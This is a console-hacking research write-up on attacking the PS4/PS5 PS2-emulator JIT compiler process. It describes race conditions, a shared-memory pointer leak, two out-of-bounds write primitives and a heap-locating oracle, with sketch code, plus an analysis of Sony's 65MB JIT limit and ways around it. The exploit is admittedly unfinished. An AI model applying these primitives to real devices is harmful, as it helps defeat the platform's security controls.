mast1c0re: Hacking the PS4 / PS5 through the PS2 Emulator - Part 2 - Compiler Attack

Initial publication: April 2nd, 2023

In the previous article I explained how I successfully escaped the PS2 emulator used in the PS4 and PS5 (through PS4 backwards compatibility) to allow execution of native ROP chains.

In this article, I'll explain how I used this context to attack the compiler process, with the goal of gaining fully arbitrary native code execution on the PS5 (not just ROP).


Output Manipulation?

As mentioned in the previous post, the emulator consists of 2 separate processes. We have so far taken over the application process, but need to also take over the compiler process in order to be able to run arbitrary native code on the PS5.

But let's step back for a second: do we really need to exploit the compiler process? Since we can jump anywhere in the application process, it would be sufficient to just get the compiler to produce continuous bytes of controlled content anywhere in the JIT output.

There's good reason to suspect that this may be possible. In one of my old PS4 articles I described how, in variable-length instruction sets like x86/64, you can find unintended instructions by decoding at offsets within existing instructions, which can then be used as ROP gadgets.

What I didn't mention is that in a process performing dynamic code generation (JIT), we actually have even more control because we can directly influence what code is being written. For example, if we use some constant in our PS2 code we can get the compiler to output native PS4 instructions like the following:

mov esi, 0x41414141

The raw bytes for the above instruction (be 41 41 41 41) clearly contain 4 bytes of controlled content for the instruction's immediate value. We can encode arbitrary hidden instructions within these immediates.
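
As a concrete illustration (the constant here is my own example, not one used later), choosing the immediate carefully hides an unintended gadget that appears when the same bytes are decoded one byte further in:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

int main(void) {
    /* If our PS2 code makes the compiler emit "mov esi, 0x0000c3c9", the
     * JIT output contains the 5 bytes below.  Decoding from offset +1
     * instead of +0 yields "c9 c3" = "leave; ret" - a gadget hidden
     * entirely inside the attacker-chosen immediate. */
    const uint8_t jit_bytes[] = { 0xbe, 0xc9, 0xc3, 0x00, 0x00 };

    uint32_t imm;
    memcpy(&imm, &jit_bytes[1], sizeof(imm));
    printf("decoded at +0: mov esi, 0x%08x\n", imm);   /* 0x0000c3c9 */
    printf("decoded at +1: leave; ret (bytes c9 c3)\n");
    return 0;
}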

Executing arbitrary single instructions is quite useful for writing ROP chains, but if we wanted to write a continuous run of arbitrary bytes, we would need some way of producing overlapping code. Whilst I didn't investigate this deeply enough to rule it out entirely, it unfortunately seems unlikely to be possible; resetting the JIT cache state also appears to overwrite old JIT code with repeated invalid instructions.


Application <-> Compiler Communication

The application and the child compiler process establish a socket between themselves (sceSystemServiceGetParentSocketForPs2Emu). This socket isn't really for transmitting data; it's just used to signal when the application would like to initiate a request to the compiler (by sending a single byte), and for the compiler to notify the application of the request's completion.

A couple of the possible requests are handled immediately, like 0x30, which is used for initialisation, and 0x42, which terminates the compiler. The other request types (0x31 for the PS2's EE processor and 0x32 for the PS2's IOP processor) trigger handling on dedicated threads, so that compilation for the various PS2 chips can happen concurrently.

The main channel of communication is the bridge region, ps2_bridge_comm_rw, which is mapped at the fixed address 0x914104000 in both processes as shared memory.
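
Putting those pieces together, a request from the application side looks roughly like the following sketch; the single-byte socket signal and the fixed bridge address are taken from the analysis above, but the request layout and offsets shown are simplified placeholders:

#include <stdint.h>
#include <unistd.h>

#define BRIDGE_ADDR 0x914104000ULL   /* fixed mapping address of ps2_bridge_comm_rw */

/* Application-side request flow: all real data goes through the bridge,
 * the socket only carries one-byte signals.  The request field offset
 * below is a made-up placeholder. */
static void compile_request(int compiler_sock, uint32_t ps2_address) {
    volatile uint8_t *bridge = (volatile uint8_t *)BRIDGE_ADDR;

    /* 1. Place the request data in shared memory (placeholder offset). */
    *(volatile uint32_t *)(bridge + 0x100) = ps2_address;

    /* 2. Signal the compiler; 0x31 = EE compile request. */
    uint8_t req = 0x31;
    write(compiler_sock, &req, 1);

    /* 3. Wait for the single-byte completion notification. */
    uint8_t done;
    read(compiler_sock, &done, 1);

    /* 4. The result now sits back in the bridge at some request-specific
     *    offset, ready for the application to read. */
}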


Race Conditions

Given a shared memory communication channel between a lower and a higher privilege process, my initial instinct was to look for race condition bugs like double-fetch / TOCTOU.

Race conditions seem quite common in this code. As one example, here's a snippet from 0x100e201 in Okage 1.01's compiler binary. It's a bounds check ensuring that the number of requested iterations is less than 0x10, but the number is read from shared memory again on every loop iteration:

if (0xf < *(uint *)((long)ptrWithinBridge + 0x3ce0)) {
  pcVar4 = (char *)0x0;
  goto LAB_0100e2ba;
}
i = 0;
do {
  ...
  i++;
  ...
} while (i < *(uint *)((long)ptrWithinBridge + 0x3ce0));

I didn't fully analyse this bug, because there are similar loops that forget the bounds check entirely (e.g. at 0x100e0be), but these don't seem to be useful, as they only lead to out-of-bounds reads of the bridge memory region, which we fully control anyway.
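
For completeness, a double fetch like this would normally be attacked by flipping the shared value between the initial check and the later re-reads; here's a minimal, purely illustrative sketch of that pattern (I never verified whether this particular site can be pushed further):

#include <pthread.h>
#include <stdint.h>

/* Flip the shared count between a value that passes the "< 0x10" check and
 * a much larger one, hoping the loop condition re-reads the large value.
 * `arg` would point at ptrWithinBridge + 0x3ce0 inside the bridge mapping. */
static void *flip_count(void *arg) {
    volatile uint32_t *count = (volatile uint32_t *)arg;
    for (;;) {
        *count = 0x0f;    /* small: passes the initial bounds check   */
        *count = 0x1000;  /* large: hopefully seen by a later re-read */
    }
    return NULL;
}

/* Usage: pthread_create(&tid, NULL, flip_count, (void *)count_addr); then
 * trigger the vulnerable request from another thread. */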


Vulnerability 1 - Pointers in Shared Memory!

The next observation was that, for some inexplicable reason, the compiler process puts 2 pointers, pointing within its data section, into the shared memory region! Shoutout to TheFlow for initially spotting this.

It sets these two fields (at offsets 0x9CA3C0 and 0x9CED90) in main during initialisation of ps2_bridge_comm_rw contents:

*(_QWORD *)(ps2_bridge_comm_rw + 0x9CA3C0) = &off_1E81E8; // <--- Pointer written to bridge!
v196 = 0LL;
// clear a 4096-byte table of 16-byte entries further along in the bridge
do
{
    *(_BYTE *)(ps2_bridge_comm_rw + v196 + 0x9CDC66) = 0;
    *(_BYTE *)(ps2_bridge_comm_rw + v196 + 0x9CDC67) = 0;
    *(_QWORD *)(ps2_bridge_comm_rw + v196 + 0x9CDC68) = 0LL;
    v196 += 16LL;
}
while ( v196 != 4096 );
*(_QWORD *)(ps2_bridge_comm_rw + 0x9CED90) = &off_1E8208; // <--- Pointer written to bridge!

Reading these pointers from our compromised application process lets us defeat ASLR of the compiler's text and data sections.

Unfortunately, overwriting the pointers doesn't seem to trigger any corruption in the compiler process because they never seem to be used.
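
Turning the leak into useful addresses is then just a subtraction. Here's a minimal sketch from the application side, assuming the off_1E81E8 name reflects the pointer's unslid offset within the compiler image:

#include <stdint.h>

#define BRIDGE_ADDR        0x914104000ULL  /* fixed bridge mapping address         */
#define LEAKED_PTR_OFFSET  0x9CA3C0ULL     /* field written by the compiler's main */
#define OFF_1E81E8_STATIC  0x1E81E8ULL     /* assumed unslid offset of off_1E81E8  */

/* Read the leaked data-section pointer out of the bridge and subtract its
 * static offset to recover the compiler's slid base address. */
static uint64_t compiler_base(void) {
    uint64_t leaked = *(volatile uint64_t *)(BRIDGE_ADDR + LEAKED_PTR_OFFSET);
    return leaked - OFF_1E81E8_STATIC;
}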


Vulnerability 2 - OOB Write in manuallyInjectFunction

The application process can manually request that a handful of specialised functions be output by the compiler. Strings in the binary reveal some of their names: Kernel_ICacheClear, Kernel_CacheClearNOP, Kernel_ERET_EnableInts, and Psychonauts_compareFunction_EMeshFrag.

Based on an error-handling string that it references ("Invalid manual injection index = %d"), I named this function manuallyInjectFunction; it is where I found the first memory corruption vulnerability.

After generating the requested function, it finishes by adding the resultant native code entry into the compiler's cache of PS2 addresses -> native code entries, and then writing its response to the bridge region, where the application can ultimately read it. Here's a decompilation of this snippet from 0x108e675:

  this->instructionMappingCache[instructionMappingIndexMasked] = iVar6;
  ptrWithinBridgeRegion = this[1].field_0x70;

  controlledIndex = *(int *)(ptrWithinBridgeRegion + 0x3c58); // <-(1)-------
  controlledIndexPlus1Masked = controlledIndex + 1U & 0x3ff;

  if (controlledIndexPlus1Masked != *(uint *)(ptrWithinBridgeRegion + 0x3c98)) {
    *(uint *)(ptrWithinBridgeRegion + 0xc60 + (long)controlledIndex * 0xc) = instructionMappingIndexMasked; // <-(2)-------
    *(int *)(ptrWithinBridgeRegion + 0xc58 + (long)*(int *)(ptrWithinBridgeRegion + 0x3c58) * 0xc) = iVar6;
    *(undefined4 *)(ptrWithinBridgeRegion + 0xc5c + (long)*(int *)(ptrWithinBridgeRegion + 0x3c58) * 0xc) = 0xffffffff;
    *(uint *)(ptrWithinBridgeRegion + 0x3c58) = controlledIndexPlus1Masked;
    return;
  }

Debugging this code revealed that ptrWithinBridgeRegion points to 0x914105B30, which resides in the bridge shared memory region, making the vulnerability quite apparent: we can have the compiler read an arbitrary 4-byte signed integer into controlledIndex at (1), and then have it used as an array index for a write at (2), without any bounds check in between!

As the bridge is mapped at a constant address, we can even calculate the exact range of addresses that this out-of-bounds index will let us write to in the compiler: anywhere from 0x314106790 (0x914105B30 + 0xc60 - 0x80000000 * 0xc) to 0xF14106784 (0x914105B30 + 0xc60 + 0x7fffffff * 0xc), at 0xc byte intervals.

The value written, instructionMappingIndexMasked, is derived from the requested PS2 address as specified by bridge memory, calculated as ((arbitrary_4bytes_read_from_bridge >> 2) & 0xffffff) * 4, so can be any multiple of 4 from 0 to 0x3fffffc.
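
To get a feel for how this primitive would be aimed, here's a minimal sketch (the helper name and structure are mine, not from the binary) of turning a desired compiler address into the index we'd place in the bridge:

#include <stdint.h>
#include <stdbool.h>

/* Vulnerability 2 as a write primitive:
 *   write_addr = 0x914105B30 + 0xc60 + 0xc * controlledIndex
 *   value      = any multiple of 4 in [0, 0x3fffffc]
 * Given a target address in the compiler, the index to place in the bridge
 * is just the distance from the array base divided by the stride. */

#define VULN2_ARRAY_BASE (0x914105B30ULL + 0xc60ULL)   /* = 0x914106790 */
#define VULN2_STRIDE     0xcLL

static bool vuln2_index_for(uint64_t target, int32_t *index_out) {
    int64_t delta = (int64_t)(target - VULN2_ARRAY_BASE);
    if (delta % VULN2_STRIDE != 0)
        return false;                 /* target doesn't sit on the 0xc stride */
    int64_t idx = delta / VULN2_STRIDE;
    if (idx < INT32_MIN || idx > INT32_MAX)
        return false;                 /* outside the reachable window         */
    *index_out = (int32_t)idx;
    return true;
}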


Vulnerability 3 - OOB Write in writeRelativeJump

Here's the code that generates relative jump instructions (x86 opcodes 0xe9 and 0xeb) at (2) and (3); however, just before that, it performs a 16-byte AVX write into an array in shared bridge memory at (1), using an index that is also read from the bridge:

    _anotherPointerWithinBridge = anotherPointerWithinBridge;
    auVar6 = vmovaps_avx(*param_2);
    auVar2 = vmovaps_avx(auVar6);
    *(undefined (*) [16])(anotherPointerWithinBridge + 0x40a0 + (long)*(int *)(anotherPointerWithinBridge + 0x4090) * 0x10) = auVar2; // <-(1)-------
    *(int *)(_anotherPointerWithinBridge + 0x4090) = *(int *)(_anotherPointerWithinBridge + 0x4090) + 1;
    local_d0 = *(byte *)&this[0x135].field_0x124 | 0x20000400;
    padJITcode(SUB168(auVar6,0),this,&local_d0,(long)*(int *)(_anotherPointerWithinBridge + 0x10));
    puVar5 = *(undefined **)((long)&this->jitOutput + 4);
    jumpTarget = *(int *)(anotherPointerWithinBridge + 0x4060 + (ulong)bVar13 * 8) - (int)puVar5;
    if (jumpTarget - 0x82U < 0xffffff00) {
      *puVar5 = 0xe9; // <-(2)-------
      lVar9 = *(long *)((long)&this->jitOutput + 4);
      *(long *)((long)&this->jitOutput + 4) = lVar9 + 1;
      *(int *)(lVar9 + 1) = jumpTarget + -5;
      lVar9 = lVar9 + 5;
    }
    else {
      *puVar5 = 0xeb; // <-(3)-------
      lVar9 = *(long *)((long)&this->jitOutput + 4);
      *(long *)((long)&this->jitOutput + 4) = lVar9 + 1;
      *(char *)(lVar9 + 1) = (char)jumpTarget + -2;
      lVar9 = *(long *)((long)&this->jitOutput + 4) + 1;
    }

Once again, as the bridge has a constant address, we can calculate the exact range of addresses that this out-of-bounds write will let us write to in the compiler. In this case, from 0x914AD2D90 + 0x40a0 - 0x80000000 * 0x10 = 0x114AD6E30 to 0x914AD2D90 + 0x40a0 + 0x7fffffff * 0x10 = 0x1114AD6E20.

Note that there's also another OOB write in the handling of a "generic rewrite request" (EE request type 0x215), but since it writes the value 0, it's slightly less interesting.


Choosing a Mapping to Corrupt

Now we need to decide which OOB vulnerability to use, and what to corrupt with it.

Since both OOB writes are relative to an array within the bridge region, which we already control in its entirety, a useful corruption target will need to be in a separate memory mapping, which will be a random number of pages away due to ASLR.

Because of this, Vulnerability 3 is much more attractive because its stride (0x10) is a factor of the page size, and so the offsets within different pages that we can corrupt will be consistent across different runs.
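
To spell that argument out, the write lands at write_base + stride * index for a known write_base, while the target mapping's base is randomised in whole pages. Here's a tiny check of when a given in-mapping offset is reachable regardless of the ASLR slide (my own framing, ignoring the 32-bit index range):

#include <stdint.h>
#include <stdbool.h>

/* A chosen offset inside the target is hittable iff the stride divides
 * (page_base + offset - write_base); when the stride also divides the page
 * size, the random page_base drops out and the answer is the same on every
 * run.  0x10 divides any power-of-two page size, whereas 0xc (with its
 * factor of 3) never does. */
static bool hits_offset_every_run(uint64_t write_base, uint64_t stride,
                                  uint64_t page_size, uint64_t offset_in_mapping) {
    return page_size % stride == 0 &&
           (int64_t)(offset_in_mapping - write_base) % (int64_t)stride == 0;
}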

We already know where the compiler process's data section is, thanks to Vulnerability 1 (the pointers in the bridge), but unfortunately it's too far away for us to corrupt: it's one of the first things mapped in the process and will have a relatively low address like 0x7d7cc000, whilst the lowest address we can write to with Vulnerability 3 is 0x114AD6E30.


Locating the Heap

A target we could reach would be the heap, but again, due to ASLR we don't know its exact address.

Sampling the base address of the 0x7000000-byte sceLibcHeap mapping across various runs shows that just 10 of its 64 bits are not constant, so we know almost 85% of the heap's base address with no prior knowledge. Even though we don't know the heap's exact base address, we know for certain that an address like 0x201000860 will always fall inside this heap mapping.

Let's go back to that instructionMappingCache array I mentioned when describing Vulnerability 2: it's an array that maps every possible PS2 address that could be executed to a 4-byte native function index. It is allocated on the heap early during initialisation (giving it offset 0x860 into the heap), and is 0x04000000 bytes... this turns out to be almost 60% of the heap!

Putting these 2 pieces together, you'll realise that there just isn't enough entropy to hide instructionMappingCache. If we pick an index that will target address 0x201000860 with OOB write Vulnerability 3, it is guaranteed to corrupt instructionMappingCache, at 1 of 2^10 == 1024 possible offsets.
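
Concretely, the bridge index needed for Vulnerability 3's write to land on that address is a constant we can compute up front (my own arithmetic, reusing the write base derived above):

#include <stdint.h>
#include <stdio.h>

int main(void) {
    /* Vulnerability 3 writes 16 bytes to write_base + 0x10 * index, and
     * 0x201000860 is guaranteed to land inside instructionMappingCache
     * (heap offset 0x860, size 0x04000000), so aim the write there. */
    const uint64_t write_base = 0x914AD2D90ULL + 0x40a0ULL;  /* 0x914AD6E30 */
    const uint64_t target     = 0x201000860ULL;

    int64_t index = ((int64_t)target - (int64_t)write_base) / 0x10;
    /* index == -0x713ad65d, which comfortably fits in the signed 32-bit
     * field the compiler reads out of the bridge. */
    printf("vuln3 index for 0x%llx: %lld\n",
           (unsigned long long)target, (long long)index);
    return 0;
}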

Once we've corrupted one of the possible entries in instructionMappingCache, we can mount an oracle attack to find exactly which entry was corrupted: request that the compiler JIT each of the 1024 PS2 addresses that could correspond to the corrupted instructionMappingCache entry, until we find the anomalous result. Once we know which index into the array was corrupted, we can calculate the array's base address, and thus the base address of the heap (by subtracting 0x860), from which we can derive the address of anything else on the heap (since the heap itself doesn't employ any randomisation).
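
Sketching that oracle loop (the request plumbing and the list of candidate heap bases are placeholders here, not code or values from the exploit):

#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>

/* Placeholder for the request plumbing: ask the compiler to JIT a PS2
 * address and report whether the result looks corrupted. */
extern bool jit_result_is_anomalous(uint32_t ps2_address);

#define CORRUPT_TARGET 0x201000860ULL  /* address hit by the OOB write        */
#define CACHE_OFFSET   0x860ULL        /* instructionMappingCache heap offset */
#define CACHE_SIZE     0x04000000LL

/* candidate_bases[] would hold the 1024 possible sceLibcHeap base addresses
 * implied by the 10 varying bits (values omitted here). */
static uint64_t locate_heap_base(const uint64_t *candidate_bases, size_t n) {
    for (size_t i = 0; i < n; i++) {
        /* If this candidate were the real heap base, the OOB write corrupted
         * the cache entry at this byte offset... */
        int64_t entry_off =
            (int64_t)(CORRUPT_TARGET - (candidate_bases[i] + CACHE_OFFSET));
        if (entry_off < 0 || entry_off >= CACHE_SIZE)
            continue;
        /* ...which belongs to this PS2 address (4-byte entries, and a PS2
         * address maps to entry ((addr >> 2) & 0xffffff)). */
        uint32_t ps2_addr = (uint32_t)(entry_off / 4) << 2;

        if (jit_result_is_anomalous(ps2_addr))
            return candidate_bases[i];   /* found the real heap base */
    }
    return 0;   /* no candidate matched */
}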


(Unfinished)

I never finished the exploit, sorry.

But summarising the primitives outlined already, it seems reasonable that they could be developed into a complete exploit taking over the compiler process:

  1. The pointers leaked into the bridge (Vulnerability 1) defeat ASLR of the compiler's text and data sections.

  2. Corrupting instructionMappingCache with Vulnerability 3 and running the oracle attack recovers the heap's base address, and with it the address of anything else on the heap.

  3. With those addresses known, the out-of-bounds writes from Vulnerabilities 2 and 3 can be aimed precisely at whichever compiler state is most useful to corrupt.


Aftermath

As discussed in my previous post, for various reasons the Operating System was not designed to force games onto their latest version, and so the fact that there are games with special privileges is an oversight in their security model, as it leaves privileged code with no readily available mechanism for being patched.

Some commenters disagreed with the above interpretation because PlayStation could still technically prevent exploitation on later updates (even though I already addressed this in my original post). I stand by my assessment because the options for doing so would be terrible: creating a software deny-list that would have to include some physical discs, or bundling binary patches for games in the OS itself.

Anyway, as I predicted, PlayStation decided not to redesign their security model and build a mechanism for enforcing game patches. Instead, they have accepted the reality that JIT compiler processes can potentially be permanently compromised, and attempted to limit the consequences of this.

Whilst I can only speculate about PlayStation's motivations, I believe their main concern is the theoretical scenario of this being used to load patched retail PS4 games into the process and boot them. PlayStation decided that they could mitigate this risk by placing a limit on the amount of JIT code that can be allocated: 65MB.


Patch Analysis

PS5 firmware 6.00 (and the equivalent PS4 firmware) introduces a new global variable that I call allocatedJitMemoryTowardsLimit; its main use is in sys_jitshm_create in sys/freebsd/sys/kern/kern_jitshm.c, which looks something like this:

        if ((requestedProt & PROT_EXEC) == 0) {
          applyJitLimit = false;
        }
        else {
          applyJitLimit =
            sceSblACMgrIsJitApplicationProcess(td->proc) ||
            sceSblACMgrIsJitCompilerProcess(td->proc);
        }

        ...

          mtx_lock(&jitCounterLock);
          
          requestedJitMemoryTowardsLimit = 0;
          if (applyJitLimit)
            requestedJitMemoryTowardsLimit = requestedSize;
          
          if (requestedJitMemoryTowardsLimit + allocatedJitMemoryTowardsLimit < 65 * 1024 * 1024) {

            // Perform allocation
            ...

            allocatedJitMemoryTowardsLimit += requestedJitMemoryTowardsLimit;
            mtx_unlock(&jitCounterLock);

And there's corresponding code to decrease the counter when freeing JIT memory.

The mitigation itself seems to be implemented correctly: there's locking so the check can't be raced; integer overflow isn't possible, because we can't request large enough allocations for separate reasons; sys_jitshm_create can't create objects with the GPU executable bit instead; we can't later add the executable protection to aliases through sys_jitshm_alias if the original doesn't have it; and so on.

But the wider implications of this mitigation strategy are more interesting than the implementation itself.


Patch Implications

The mitigation does indeed prevent you from loading large programs completely into memory all at once. But is that strictly necessary for them to be run?

There are a couple of tricks that come with some performance overhead, but I believe would make it possible to "run" larger amounts of code than the imposed limit:

  1. Since not all code is constantly required, it could be dynamically paged in as needed (see the sketch after this list). A more sophisticated approach could even use profiling to identify "hot paths" and prioritise spending the JIT budget on those to maximise performance.

  2. The 65MB JIT budget could be used to write an efficient x86-64 emulator in native x86-64. Specifically, on other platforms where JIT is limited, we've seen an interesting technique of using weird-machine control flow to jump directly between ROP-like gadgets that emulate individual instructions, as opposed to the more traditional interpreter loop. I first saw this technique in the 'goombacolor' GameBoy Color emulator for the GameBoy Advance (where the game has to reside in cartridge ROM, which obviously can't be rewritten, instead of in size-limited RAM), but a more modern example is the UTM SE project (described here), which shows how efficient this type of emulator can be on modern platforms like iOS, where JIT is disallowed.
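
As a rough illustration of point 1, here's a hypothetical sketch of demand-paging JIT code under a fixed budget; jit_map_exec and jit_unmap are placeholders for whatever JIT shared-memory API the process would really use, not actual PlayStation functions:

#include <stdint.h>
#include <stddef.h>

struct jit_chunk {
    uint64_t guest_addr;   /* guest code region this chunk was compiled from */
    void    *host_code;    /* executable mapping, NULL if currently evicted  */
    size_t   size;
    uint64_t last_used;    /* timestamp for least-recently-used eviction     */
};

#define MAX_CHUNKS 1024
static struct jit_chunk chunks[MAX_CHUNKS];
static uint64_t tick;

extern void *jit_map_exec(uint64_t guest_addr, size_t *size_out); /* compile + map (placeholder) */
extern void  jit_unmap(void *code, size_t size);                  /* release (placeholder)       */

/* Free the least-recently-used resident chunk to reclaim budget. */
static void evict_lru(void) {
    struct jit_chunk *victim = NULL;
    for (size_t i = 0; i < MAX_CHUNKS; i++)
        if (chunks[i].host_code &&
            (!victim || chunks[i].last_used < victim->last_used))
            victim = &chunks[i];
    if (victim) {
        jit_unmap(victim->host_code, victim->size);
        victim->host_code = NULL;
    }
}

/* Return executable code for guest_addr, recompiling it if it was evicted
 * to stay under the budget (error handling omitted). */
static void *get_code(uint64_t guest_addr) {
    for (size_t i = 0; i < MAX_CHUNKS; i++)
        if (chunks[i].host_code && chunks[i].guest_addr == guest_addr) {
            chunks[i].last_used = ++tick;
            return chunks[i].host_code;          /* already resident */
        }

    size_t size = 0;
    void *code;
    while ((code = jit_map_exec(guest_addr, &size)) == NULL)
        evict_lru();                             /* assume NULL means "over budget" */

    for (size_t i = 0; i < MAX_CHUNKS; i++)
        if (!chunks[i].host_code) {
            chunks[i] = (struct jit_chunk){ guest_addr, code, size, ++tick };
            break;
        }
    return code;
}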

Furthermore, when considering the scenario of trying to run PS4 games on the PS5, some amount of overhead might even be offset by the fact that the PS5 runs faster than the PS4 anyway.


Conclusion

There's a reasonably good chance that with enough motivation the vulnerabilities described in this post could be exploited to take over the compiler process.

Such an exploit would give arbitrary native code execution on the latest firmwares of the PS4 and PS5, allowing native homebrew applications to be run off USB storage, for example.

Even with the mitigation Sony shipped in response to this research to limit the size of applications that can be run, I still believe it would be possible to run larger applications, albeit with the performance overhead of them being partially emulated or dynamically paged in and out. Given the amount of work required, I don't realistically think we'll see polished demos of Linux or retail PS4 games running, but it's fun to think that there's a good chance those things might at least be technically possible.


Thanks

flatz, balika011, theflow0, chicken(s), PlayStation